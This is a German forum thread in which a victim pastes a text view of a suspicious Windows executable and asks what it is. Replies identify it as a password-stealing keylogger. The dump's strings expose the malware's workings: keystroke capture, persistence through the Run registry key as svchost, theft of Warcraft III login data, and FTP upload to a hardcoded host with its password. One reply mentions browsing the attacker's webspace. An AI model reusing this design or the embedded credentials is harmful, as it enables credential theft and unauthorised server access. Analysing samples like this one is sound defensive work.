Wurde gehackt - welche Programmiersprache?

Dieses Thema im Forum "Programmierung & Entwicklung" wurde erstellt von KirO, 23. Januar 2008 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 23. Januar 2008
    Hallo,

    jemand wollte dafür sorgen das ich eine exe ausführe, die vermutlich einen keylogger und andere sachen beinhaltete.

    wenn ich die exe als txt öffne kann man einiges lesen, aber nicht alles (siehe unten)
    meine Frage um was handelt es sich hierbei? der javaeditor kann es nicht öffnen und mit eclipse bekomme ich auch keine ergebnisse.

    Danke euch!

    Code:
    MZ ÿÿ ¸ @ ø º ´ Í!¸LÍ!This program cannot be run in DOS mode.
    
    $ î[ˏ5Qˏ5Qˏ5QìIHQʏ5QìIXQߏ5QìINQϏ5QìI[Qɏ5Q€hQ͏5QH‡hQȏ5Qˏ4Q…5QìIGQʏ5QìIMQʏ5QRichˏ5Q PE L <–G à Ÿ 0 @ p öQ ,5 Œ ` ¬ p1 ˆ3 @ 0 H .text » `.rdata ¶ 0 @ @.data P ( @ À.rsrc ¬ ` * @ @ è „À¢tS@ u¡xS@ ˆ¨1@ Q¹|S@ ÿp0@ Vèå j hð2@ h3@ ÿ0@ h(3@ h83@ ÿ0@ ÿ 0@ ‹5,1@ j h°1@ ÿÖj Pÿ(1@ ëI j hÄ1@ ÿÖ…Àtóè ƒø^uè³ é ÌÌÌÌÌÌÌÌÌÌÌÌÌÌQS‹1@ U‹-1@ VW‹=1@ 덤$ j hÄ1@ ÿ,1@ …Àtï¸ ‰D$› ¿ÀPÿ$1@ f=€…$ ƒ=°S@ ¡œS@ s¸œS@ hì1@ Pÿ1@ ‹ðƒÄ…ö„' ‹D$f=' |f=@ ¿ÈVQÿÕVÿ׃Äëf=@ ~
    f=[ Œã ¿ÀƒÀø=Ö ‡* ¶€¼@ ÿ$…T@ Vj ÿÕVÿ׃Äéš Vhð1@ ÿÓVÿ׃Äé‡ Vhø1@ ÿÓVÿ׃Äét Vh2@ ÿÓVÿ׃Äéa Vh2@ ÿÓVÿ׃ÄéN Vh2@ ÿÓVÿ׃Äé; Vh 2@ ÿÓVÿ׃Äé( Vh(2@ ÿÓVÿ׃Äé Vh02@ ÿÓVÿ׃Äé Vh82@ ÿÓVÿ׃Äéï Vh@2@ ÿÓVÿ׃ÄéÜ VhH2@ ÿÓVÿ׃ÄéÉ VhP2@ ÿÓVÿ׃Äé¶ VhX2@ ÿÓVÿ׃Äé£ Vj0ÿÕVÿ׃Äé“ Vj1ÿÕVÿ׃Äéƒ Vj2ÿÕVÿ׃ÄëvVj3ÿÕVÿ׃ÄëiVj4ÿÕVÿ׃Äë\Vj5ÿÕVÿ׃ÄëOVj6ÿÕVÿ׃ÄëBVj7ÿÕVÿ׃Äë5Vj8ÿÕVÿ׃Äë(Vj9ÿÕVÿ׃ÄëVh`2@ ÿÓVÿ׃ÄëVÿ׃Äèx ‹D$ƒÀf=Þ ‰D$Ž³ýÿÿéŽýÿÿƒÀ ¿ÐVRÿÕVÿ׃Äéyýÿÿ_^]¸ [YËÿ¤@ ·@ ‘@ ~@ Ê@ ý@ n@ Ý@ u@ …@ •@ ¢@ ¯@ ¼@ É@ Ö@ ã@ ð@ ð@ @ @ )@ <@ O@ b@ 
    @ 
    
    ÌÌÌÌÌÌÌÌÌÌÌÌ̃ì\¡P@ 3ĉD$XVD$Pjj hl2@ ¾P h €‰t$ÿ 0@ …Àt¸ ^‹L$X3ÌèP ƒÄ\ËD$L$QT$Rj j hœ2@ Pÿ0@ …Àu9t$v …À¾ u3ö‹L$Qÿ0@ ‹L$\‹Æ^3Ìè ƒÄ\ÃÌÌÌÌÌÌQ$Phl2@ h €ÿ0@ …Àu0¸Ô1@ PŠƒÀ„Éu÷‹$+ÂPhÔ1@ jj hœ2@ Qÿ0@ 3ÀYø YÃVWj j j jh¤2@ ÿ81@ j j jh°2@ h¼2@ j‹øhÈ2@ Wÿ@1@ ‹
    ¸S@ ‹ð¸ 9ÌS@ s¹¸S@ 9èS@ ¡ÔS@ s¸ÔS@ j jQPVÿ<1@ V‹541@ ÿÖWÿÖ_°^ÃÌU‹ìƒäøjÿhÍ @ d¡ Pìà ¡P@ 3ĉ„$Ø SVW¡P@ 3ÄP„$ð d£ Œ$Ì ÿ€0@ » SjL$TÇ„$ ÿ`0@ ˆœ$ø ¡xS@ PL$Pÿh0@ L$QL$Pÿ\0@ PŒ$Ð Æ„$ü ÿt0@ L$ˆœ$ø ÿx0@ ‹5Œ0@ hà2@ T$h|S@ RÿÖƒÄP¹˜S@ Æ„$ü ÿt0@ L$ˆœ$ø ÿx0@ ‹=˜0@ h|S@ D$4hè2@ Pÿ×hà2@ PL$(QÆ„$ ÿÖƒÄP¹ÐS@ Æ„$ü ÿt0@ L$Æ„$ø ÿx0@ L$0ˆœ$ø ÿx0@ h|S@ T$hì2@ Rÿ×hà2@ PD$DPÆ„$ ÿÖƒÄP¹´S@ Æ„$ü ÿt0@ L$0Æ„$ø ÿx0@ L$ˆœ$ø ÿx0@ L$LÆ„$ø ÿ„0@ Œ$Ì Ç„$ø ÿÿÿÿÿx0@ ‹Œ$ð d‰
     Y_^[‹Œ$Ø 3Ìè ‹å]ÃÌÌÌÌÌ̃ìWD$Ph? j hD3@ h €ÇD$ ÇD$ ÿ 0@ ‹D$‹=0@ L$Qj T$Rj h|3@ Pÿ׋
    ˆ0@ ‹T$Q‹
    0@ Rÿd0@ ‹Èÿl0@ ƒ|$ur‹D$VPè ƒÄL$Q‹ð‹D$VT$Rj h|3@ Pÿ×V¹|S@ ÿp0@ Vè$ ƒÄƒ|$^u,ƒ=”S@ ¡€S@ s¸€S@ L$QT$R‹T$L$Qj PRÿ׋D$Pÿ0@ h¤1@ h|S@ ÿ”0@ ƒÄ„À•À_ƒÄÃét ;
    P@ uóÃék jhh4@ èw ÿ5 T@ ‹5¼0@ ÿÖY‰Eäƒøÿuÿuÿ¸0@ YëajèE Yƒeü ÿ5 T@ ÿÖ‰Eäÿ5üS@ ÿÖ‰EàEàPEäPÿuè ‰EÜÿuä‹5¬0@ ÿÖ£ T@ ÿuàÿփģüS@ ÇEüþÿÿÿè ‹EÜè3 ÃjèÒ YÃÿt$èXÿÿÿ÷ØÀ÷ØYHÃÿ%1@ hn@ èÞÿÿÿ¡hS@ Ç$4P@ ÿ5dS@ £4P@ h$P@ h(P@ h P@ ÿÄ0@ ƒÄ…À£0P@ }jèÿ YÃjhˆ4@ èu 3Û‰]üd¡ ‹p‰]ä¿ôS@ SVWÿL0@ ;Ãt;Æu3öF‰uäëhè ÿH0@ ëÚ3öF¡ðS@ ;Æu
    jè¢ Yë;¡ðS@ …Àu,‰5ðS@ hl1@ hd1@ èÁ YY…ÀtÇEüþÿÿÿ¸ÿ éÝ ‰5<P@ ¡ðS@ ;Æuh`1@ hH1@ è† YYÇðS@ 9]äuSWÿP0@ 9øS@ thøS@ èï Y…Àt
    SjSÿøS@ ¡$P@ ‹
    Ø0@ ‰ÿ5$P@ ÿ5(P@ ÿ5 P@ èªôÿÿƒÄ£8P@ 9,P@ u7PÿÔ0@ ‹Eì‹‹ ‰MàPQè YYËeè‹Eà£8P@ 3Û9,P@ uPÿÌ0@ 9<P@ uÿÈ0@ ÇEüþÿÿÿ¡8P@ èQ Ãf= @ MZt3ÀëQ¡< @ ¸ @ PE uë·ˆ @ ù tù uÔƒ¸„ @ vË3É9ˆø @ 냸t @ v¸3É9ˆè @ •Á‹Áj£,P@ ÿø0@ jÿÿ¬0@ YY£üS@ £ T@ ÿô0@ ‹
    pS@ ‰ÿð0@ ‹
    lS@ ‰¡ì0@ ‹ £ìS@ èß èC ƒ=P@ uh³@ ÿè0@ Yè ƒ=P@ ÿu jÿÿä0@ Y3ÀÃè éžýÿÿÌÿ%¤0@ U‹ìì( £HQ@ ‰
    DQ@ ‰@Q@ ‰<Q@ ‰58Q@ ‰=4Q@ fŒ`Q@ fŒ
    TQ@ fŒ0Q@ fŒ,Q@ fŒ%(Q@ fŒ-$Q@ œXQ@ ‹E £LQ@ ‹E£PQ@ E£\Q@ ‹…àüÿÿǘP@ ¡PQ@ £LP@ Ç@P@ ÀÇDP@ ¡P@ ‰…Øüÿÿ¡P@ ‰…Üüÿÿÿ$0@ £P@ jèÏ Yj ÿ(0@ hŒ1@ ÿ,0@ ƒ=P@ ujè« Yh ÀÿD0@ PÿT0@ ÉÃÿ%¨0@ ÿ%°0@ ÿ%´0@ ÌÌh!@ dÿ5 ‹D$‰l$l$+àSVW¡P@ 1Eü3ÅP‰eèÿuø‹EüÇEüþÿÿÿ‰EøEðd£ ËMðd‰
     Y__^[‹å]QÃÿt$ÿt$ÿt$ÿt$h6@ hP@ è ƒÄÃÿ%À0@ VW¸\4@ ¿\4@ ;Ç‹ðs‹…ÀtÿЃÆ;÷rñ_^ÃVW¸d4@ ¿d4@ ;Ç‹ðs‹…ÀtÿЃÆ;÷rñ_^Ãÿ%Ð0@ ÌÌÌÌÌÌÌÌ‹L$f9MZt3ÀËA<Á8PE uð3Éfx”Á‹ÁÃÌÌÌÌÌÌÌ‹D$‹H<È·ASV·q3Ò…öWDv‹|$‹H;ùr ‹XÙ;ûrƒÂƒÀ(;Öræ3À_^[Ãjh¨4@ èªþÿÿƒeü º @ RèsÿÿÿY…Àt=‹E+ÂPRè’ÿÿÿYY…Àt+‹@$Áè÷ЃàÇEüþÿÿÿë ‹Eì‹ ‹ 3É= À”Á‹ÁËeèÇEüþÿÿÿ3ÀèþÿÿÃÿ%Ü0@ ÿ%à0@ Vh h 3öVè¿ ƒÄ…Àt
    VVVVVè¨ ƒÄ^Ã3ÀÃU‹ìƒì¡P@ ƒeø ƒeü SW¿Næ@»;Ç» ÿÿt
    …Ãt ÷УP@ ë`VEøPÿ<0@ ‹uü3uøÿ80@ 3ðÿ40@ 3ðÿ00@ 3ðEðPÿ@0@ ‹Eô3Eð3ð;÷u¾Oæ@»ë…óu‹ÆÁàð‰5P@ ÷Ö‰5P@ ^_[ÉÃÿ%ü0@ ÿ% 1@ ÿ%1@ ÿ%1@ ÿ% 0@ ÌÌÌÌÌÌÌ̍MÐÿ%x0@ Pÿÿÿÿ%„0@ ÿÿÿÿ%x0@ ÿÿÿÿ%x0@ 4ÿÿÿÿ%x0@ ÿÿÿÿ%x0@ ÿÿÿÿ%x0@ 4ÿÿÿÿ%x0@ ‹T$‚ÿÿÿ‹Šÿÿÿ3ÈèRøÿÿƒÀ‹Jø3ÈèEøÿÿ¸5@ égÿÿÿÌÌÌÌÌh¤1@ ¹|S@ ÿ|0@ h€!@ èÊøÿÿYÃÌÌÌ̹˜S@ ÿ€0@ h!@ è¯øÿÿYÃÌÌÌÌÌÌÌÌ̹ÐS@ ÿ€0@ h !@ èøÿÿYÃÌÌÌÌÌÌÌÌ̹´S@ ÿ€0@ h°!@ èoøÿÿYÃÌÌÌÌÌÌÌÌ̹|S@ ÿ%x0@ ÌÌÌÌ̹˜S@ ÿ%x0@ ÌÌÌÌ̹ÐS@ ÿ%x0@ ÌÌÌÌ̹´S@ ÿ%x0@ ü7 ì7 Ø7 Æ7 8 d7 p7 T7 @ þ? â? J@ Z@ p@ †@ 0@ Î? ”? œ? ~? º? à9 n: À: ; @; ; â; 6< €< Ì< = h= `9 ¤8 (8 à8 @ ì= > > $> 2> :> D> V> d> t> ~> †> ”> œ> ¨> ´> Â> Ø> ì> ü> ? ? ,? B? \? n? Ò= Ê= Â= º= â= ¦7 ˜7 Š7 27 "7 7 7 ü@ !@ !@ @!@ `!@ ½@ <–G w Ð3 Ð @P@ ˜P@ bad allocation 00 Default ConsoleWindowClass Warcraft III c:\%windir%\svchost.exe a+ [SHIFT] 
    [ENTER] [BACKSPACE] [TAB] [CTRL] [DEL] [;:] [/?] [`~] [ [{ ] [\|] [ ]} ] ['"] [CAPS LOCK] SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost FTP Upload passwort iloveall iloveall.il.ohost.de .dat .\ // C:\WINDOWS\system32\MessengerUpdate.exe .\Tiehack.exe 0o0o0o0o0o0o0 Tiehack.exe Software\Blizzard Entertainment\Warcraft III\String\ userbnet H P@ P4@ RSDSÝb’rð„.Md
    ò ™A c:\Dokumente und Einstellungen\Mapa\Desktop\Cheat\KeyloggerMDH\Keylogger\Release\Keylogger.pdb ! Í þÿÿÿ Ìÿÿÿ þÿÿÿ Û@ þÿÿÿ Ðÿÿÿ þÿÿÿm@ @ þÿÿÿ Øÿÿÿ þÿÿÿX@ l@ ÿÿÿÿp @ y @ … @ ‘ @  @ © @ µ @ Á @ "“ È4@ ì6 H7 41 Ð5 |7 0 Ü6 º7 $1 ¸5 8 0 6 ®= \0 X6 ü= 0 ü7 ì7 Ø7 Æ7 8 d7 p7 T7 @ þ? â? J@ Z@ p@ †@ 0@ Î? ”? œ? ~? º? à9 n: À: ; @; ; â; 6< €< Ì< = h= `9 ¤8 (8 à8 @ ì= > > $> 2> :> D> V> d> t> ~> †> ”> œ> ¨> ´> Â> Ø> ì> ü> ? ? ,? B? \? n? Ò= Ê= Â= º= â= ¦7 ˜7 Š7 27 "7 7 7 o InternetConnectA 4 FtpPutFileA ’ InternetOpenA i InternetCloseHandle WININET.dll 
     AllocConsole C CopyFileA nMoveFileA KERNEL32.dll ã FindWindowA ’ShowWindow ò GetAsyncKeyState USER32.dll RegSetValueExA ÷RegQueryValueExA ÐRegCreateKeyA ìRegOpenKeyExA ËRegCloseKey ADVAPI32.dll ? ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z u?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A i ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z g ??$?HDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z |?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ d??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z ±??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z ¯??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z [??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ v??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z {??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??_D?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ ™?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z MSVCP80.dll èfputc éfputs äfopen ??3@YAXPAX@Z Ùfclose ??2@YAPAXI@Z MSVCR80.dll í_unlock m_encode_pointer — __dllonexit |_lock "_onexit c_decode_pointer _amsg_exit __getmainargs /_cexit _exit g _XcptFilter Öexit ¡ __initenv 
    _initterm _initterm_e ?_configthreadlocale é __setusermatherr _adjust_fdiv Ì __p__commode Ð __p__fmode æ __set_app_type N_crt_debugger_hook v_except_handler4_common _invoke_watson B_controlfp_s )InterlockedExchange VSleep &InterlockedCompareExchange ^TerminateProcess BGetCurrentProcess nUnhandledExceptionFilter JSetUnhandledExceptionFilter 9IsDebuggerPresent £QueryPerformanceCounter ßGetTickCount FGetCurrentThreadId CGetCurrentProcessId ÊGetSystemTimeAsFileTime t __CxxFrameHandler3 ”1@ Næ@»±¿Dÿÿÿÿÿÿÿÿþÿÿÿ ”1@ € 0 € H X` R ä <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
     <dependency>
     <dependentAssembly>
     <assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50608.0" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>
     </dependentAssembly>
     </dependency>
    </assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
     
  2. 23. Januar 2008
    AW: Wurde gehackt - welche Programmiersprache?

    Wer warn der jemand ^^

    Joa sieht aus wien Keylogger !!!

    Aber warum löscht du die exe nicht einfach ???
     
  3. 23. Januar 2008
    AW: Wurde gehackt - welche Programmiersprache?

    sieht ganz einfach nachm stealer aus der deine pw's ausliest und auf dem ftp von ohost geuppt hat also einfach exe löschen und gut is aber der meister hat all deine pws also hf beim pw ändern ^^ bzw wenn das noch geht ...mehr kann er dir nich antun glaub kaum das bei nem ftp upload stealer nen keylog dabei is oO
     
    1 Person gefällt das.
  4. 23. Januar 2008
    AW: Wurde gehackt - welche Programmiersprache?

    woher nimmt der meine passwörter?

    hier im quelltext standen auch die logindaten des uploads, habe da meine datei gelöscht und es kommt auch keine neue.

    also was kann ich da noch tun? was sind das für windowseinträge?
     
  5. 23. Januar 2008
    AW: Wurde gehackt - welche Programmiersprache?

    Ich würde auf VisualBasic tippen, aber keine Garantie, auf dem Webspace befindet sich 1 File :

    Scheint ein Log von dir? zu sein.
     
  6. 23. Januar 2008
    AW: Wurde gehackt - welche Programmiersprache?

    nein, nicht von mir, vom nächsten opfer, der weiss aber schon bescheid
     
  7. 23. Januar 2008
    AW: Wurde gehackt - welche Programmiersprache?

    Disassembler. Exe/Binary Analyzer. H&S.

    ~closed~

    Mfg,

    Kolazomai
     
  8. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.